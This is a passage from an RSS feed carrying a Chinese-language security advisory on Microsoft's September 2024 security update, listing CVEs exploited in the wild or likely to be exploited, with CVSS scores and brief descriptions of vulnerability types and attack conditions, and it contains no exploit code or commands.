YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247496660">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=52f8a23b&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496660%26idx%3D1%26sn%3D2df0f0b44caaa7409835aca42df5551c%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 09 Oct 2024 14:43:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于微软2024年9月安全更新的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496658&amp;idx=1&amp;sn=02005282a824b73cb47aac5119d935e7</link>
      <description>2024年9月11日，天融信阿尔法实验室监测到微软官方发布了9月安全更新。此次更新共修复79个漏洞，其中7个严重漏洞、71个重要漏洞、1个中危漏洞。</description>
      <content:encoded><![CDATA[<p>
原创 <span>天融信应急响应</span> <span>2024-09-11 15:57</span> <span style="display: inline-block;">北京</span>
</p>

<p>2024年9月11日，天融信阿尔法实验室监测到微软官方发布了9月安全更新。此次更新共修复79个漏洞，其中7个严重漏洞、71个重要漏洞、1个中危漏洞。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=b9f6448d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABcSkgTrIxBsgHiaHKWYIddeKgQ7v38EL68obnaSRJjpxDrSOAf34MkIA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.29259259259259257" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a7b7e105&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABpjDae9Wfv6vs4Tg5bETzto4ibjJCEjTWJm0R7fx5lNS9nlpbHtD3Ziag%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x00 背景介绍</span></strong><br/></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;margin-top: 16px;margin-bottom: 8px;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;">2024年9月11日，天融信阿尔法实验室监测到微软官方发布了9月安全更新。此次更新共修复79个漏洞，其中7个严重漏洞(Critical)、71个重要漏洞(Important)、1个中危漏洞(Moderate)。其中权限提升漏洞30个、远程代码执行漏洞23个、信息泄露漏洞11个、拒绝服务漏洞8个、欺骗漏洞2个、安全功能绕过漏洞4个、XSS漏洞1个。</span><br/></p><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px 8px;text-indent: 0em;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgb(0, 0, 0);">本次微软安全更新涉及组件包括：Windows Installer、Windows Mark of the Web (MOTW)、Microsoft Office Publisher、Windows Update、Microsoft Office SharePoint、Microsoft Streaming Service、Windows Win32K、Microsoft Graphics Component、Windows Setup and Deployment、Windows MSHTML Platform、Azure Stack、SQL Server、Windows TCP/IP等多个产品和组件。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px 8px;text-indent: 0em;"><span style="color: rgb(0, 0, 0);font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgb(0, 0, 0);">微软本次修复中，CVE-2024-38014、CVE-2024-38217、CVE-2024-38226、CVE-2024-43491被在野利用，且CVE-2024-38217被公开披露。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 16px 0px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="margin-bottom: 0px;letter-spacing: 0.578px;white-space: normal;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;">0x01 </span></strong><span style="font-size: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;"><span style="font-size: 24px;line-height: 36px;"><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">重点</span></strong><strong style="white-space: normal;color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;"><span style="font-size: 24px;line-height: 36px;">漏洞描述</span></strong></span></strong></span><br/></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;background-color: rgb(255, 255, 255);"/><section style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);">本次微软更新中重点漏洞的信息如下所示。<br/></span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;font-size: 16px;"><p style="margin-bottom: 8px;text-align: left;margin-top: 0px;"><span style="font-size: 16px;"><strong>在野利用和公开披露漏洞</strong></span></p></li></ul><table align="center" data-sort="sortDisabled" width="578"><tbody><tr><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">CVE</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">漏洞名称</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;letter-spacing: 0.578px;text-wrap: wrap;">CVSS3.1</span></td></tr><tr><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;">CVE-2024-38014</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;">Windows Installer本地权限提升漏洞</span></td><td valign="top" style="word-break: break-all;border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;">7.8/7.2</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="156"><span style="font-size: 14px;">CVE-2024-38217</span></td><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="333"><span style="font-size: 14px;">Windows网络标记(MOTW)安全功能绕过漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="border-color: rgb(221, 221, 221);" width="88"><span style="font-size: 14px;">5.4/5.0</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="border-left-color: rgb(221, 221, 221);border-top-color: rgb(221, 221, 221);"><span style="font-size: 14px;">CVE-2024-38226</span></td><td valign="top" colspan="1" rowspan="1" style="border-left-color: rgb(221, 221, 221);border-top-color: rgb(221, 221, 221);"><span style="font-size: 14px;">Microsoft Publisher安全功能绕过漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="border-left-color: rgb(221, 221, 221);border-top-color: rgb(221, 221, 221);"><span style="font-size: 14px;">7.3/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">CVE-2024-43491</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">Windows Update远程代码执行漏洞</span></td><td valign="top" colspan="1" rowspan="1"><span style="font-size: 14px;">9.8/9.1</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-bottom: 8px;text-align: left;margin-top: 0px;"><span style="letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 14px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38014：Windows Installer本地权限提升漏洞</span></span></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞已发现在野利用。此漏洞是Windows Installer中的权限管理不当漏洞（CWE-269）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 8px 0px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38217：Windows网络标记(MOTW)安全功能绕过漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞已发现在野利用，且被公开披露。此漏洞是Windows网络标记(MOTW)安全功能中的保护机制失效漏洞（CWE-693）。未经身份认证的远程攻击者通过在其控制的服务器上托管一个文件，然后诱使目标用户下载并打开该文件来利用此漏洞。成功利用此漏洞能够绕过Windows网络标记(MOTW)安全功能。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38226：Microsoft Publisher安全功能绕过漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞已发现在野利用。此漏洞是Microsoft Publisher中的保护机制失效漏洞（CWE-693）。经过身份认证的攻击者可以通过社会工程说服受害者从网站下载并打开特制文件来利用此漏洞。成功利用此漏洞的攻击者可以绕过用于阻止不受信任或恶意文件的Office宏策略。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43491：Windows Update远程代码执行漏洞</span></span></span></section></li></ul><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">该漏洞已发现在野利用。此漏洞是Windows Update中的释放后重用UAF漏洞（CWE-416）。未经身份认证的远程攻击者通过向目标系统发送特制的数据包来利用此漏洞。成功利用此漏洞可使目标系统的安全补丁回滚到之前的版本，从而重新引入已修复的漏洞。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">只有启用了Windows 10 1507中一些可选组件的系统会受到此漏洞的影响，具体影响组件请查看以下链接。</span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-43491" target="_blank">https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-43491</a></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);font-size: 16px;">漏洞利用可能性较大的漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="329" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="65" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38018</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft SharePoint Server远程代码执行漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38227</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft SharePoint Server远程代码执行漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.2/6.3</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38228</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft SharePoint Server远程代码执行漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.2/6.3</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43464</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft SharePoint Server远程代码执行漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.2/6.3</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38237</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Kernel Streaming WOW Thunk服务驱动本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38238</span></td><td width="349" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Kernel Streaming服务驱动本地权限提升漏洞</span></td><td width="85" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38241</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Kernel Streaming服务驱动本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38242</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Kernel Streaming服务驱动本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38243</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Kernel Streaming服务驱动本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38244</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Kernel Streaming服务驱动本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38245</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Kernel Streaming服务驱动本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38246</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Win32k本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.0/6.1</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38252</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Win32k本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38253</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows Win32k本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38247</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows图形组件本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38249</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows图形组件本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43457</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows设置和部署本地权限提升漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">7.8/6.8</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43461</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows MSHTML平台欺骗漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-43487</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">Windows网络标记(MOTW)安全功能绕过漏洞</span></td><td valign="top" colspan="1" rowspan="1" style="word-break: break-all;"><span style="font-size: 14px;">6.5/6.0</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38018、CVE-2024-43464、CVE-2024-38227、CVE-2024-38228：Microsoft SharePoint Server远程代码执行漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38018和CVE-2024-43464是Microsoft SharePoint Server中的不可信数据反序列化漏洞（CWE-502）。经过身份认证的站点成员可以将特制文件上传到目标SharePoint Server，并制作专门的API请求以触发文件参数的反序列化来利用这些漏洞。成功利用这些漏洞的攻击者能够在SharePoint Server上下文中执行任意代码。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38227和CVE-2024-38228是Microsoft SharePoint Server中的命令注入漏洞（CWE-77）。经过身份认证的具有站点所有者权限的用户可以利用此漏洞注入任意命令，并在SharePoint Server上下文中执行这些命令。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38237、CVE-2024-38238、CVE-2024-38241、CVE-2024-38242、CVE-2024-38243、CVE-2024-38244、CVE-2024-38245：Kernel Streaming服务驱动本地权限提升漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38237、CVE-2024-38238和CVE-2024-38242是Kernel Streaming服务驱动中的堆溢出漏洞（CWE-122）。CVE-2024-38241、CVE-2024-38243、CVE-2024-38244、CVE-2024-38245是Kernel Streaming服务驱动中的输入验证不当漏洞（CWE-20）。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38246、CVE-2024-38252、CVE-2024-38253：Windows Win32k本地权限提升漏洞</span></span></span><br/></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38246是Windows Win32k中的栈溢出漏洞（CWE-121）。CVE-2024-38252和CVE-2024-38253是Windows Win32k中的释放后重用UAF漏洞（CWE-416）。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 